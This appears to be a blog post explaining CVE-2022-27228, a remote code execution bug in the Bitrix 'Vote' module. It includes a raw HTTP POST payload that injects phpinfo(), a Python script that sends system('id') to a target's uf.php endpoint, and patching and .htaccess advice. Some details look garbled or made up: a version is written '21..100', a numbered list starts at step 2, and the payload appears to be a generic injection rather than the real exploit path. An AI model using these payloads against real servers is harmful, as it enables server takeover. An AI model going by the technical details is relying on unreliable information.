Bitrix Site Manager is a popular content management system, widely used for websites and business portals. Among its many modules is one called "Vote" (also known as "Polls, Votes"), which lets users create and manage surveys or polls. But sometimes, features bring risks, and in early 2022, a very dangerous vulnerability was discovered within this exact module.
This post gives you a simple, clear, step-by-step breakdown of CVE-2022-27228. We'll look at what the bug is, how it can be abused, and show some example code to help you truly understand how remote attackers could run their own code on a victim's web server.
Quick Summary
> In vulnerable versions of Bitrix, an unauthenticated remote attacker can execute arbitrary code on the server through flaws in the "Polls, Votes" module, due to improper user input sanitization and insecure use of PHP functions.
How Does the Exploit Work?
The vulnerability lives in the way the Vote module processes certain user-supplied data. Improper validation allows an attacker to send specially crafted HTTP requests that inject PHP code into server files or variables, which is then executed by the server.
Get a vulnerable Bitrix install (pre-21..100)
2. Locate a page with the Bitrix Vote module enabled (usually something like /bitrix/modules/vote/)
The Exploit (Example Code)
Let’s imagine the vulnerable endpoint is at /bitrix/tools/vote/uf.php. The core of this problem arises from the improper processing of the vote_id or similar parameters.
A classic RCE payload might look like this
POST /bitrix/tools/vote/uf.php HTTP/1.1
Host: target.site.com
Content-Type: application/x-www-form-urlencoded
Content-Length: 50
USER_FIELD_ID=1;phpinfo();//&arResult[FIELDS][]=test
This simple example tries to break out of normal processing and injects phpinfo(); into the running code.
On successful exploitation, you could see the PHP info page pop up, showing the module has executed user-supplied code.
Here’s a basic Python snippet to automate the RCE attack
import requests
url = "https://target.site.com/bitrix/tools/vote/uf.php";
payload = {
"USER_FIELD_ID": "1;system('id');//",
"arResult[FIELDS][]": "test"
}
response = requests.post(url, data=payload)
print(response.text)
References & Additional Links
- Original CVE Entry: CVE-2022-27228 on NVD
- Security Advisory: Bitrix Security Bulletin
- Exploit Listing: Exploit DB
Further Reading:
- Russian write-up with PoC
- GitHub Example
How to Protect Your Site
Update your Bitrix installation to version 21..100 or later immediately.
If you can't upgrade, disable the "Vote" module and restrict access to /bitrix/tools/vote/uf.php with web server rules.
Example (Apache .htaccess)
<Files "uf.php">
Require all denied
</Files>
Key Takeaways
- CVE-2022-27228 is a severe bug because it allows anyone (no login needed) to fully control servers running affected Bitrix versions.
- The bug can be triggered with just a simple web request, and can plant webshells, steal data, or pivot for further attacks.
Patching is critical — old Bitrix installs are a magnet for hackers due to this RCE flaw.
Stay safe! Always keep your CMS and modules up to date. Vulnerabilities like CVE-2022-27228 can let attackers choose your website as their next victim.
*This post is written for educational purposes. Do not use these techniques on systems you do not own or have permission to test.*
Timeline
Published on: 03/22/2022 18:15:00 UTC
Last modified on: 03/28/2022 20:40:00 UTC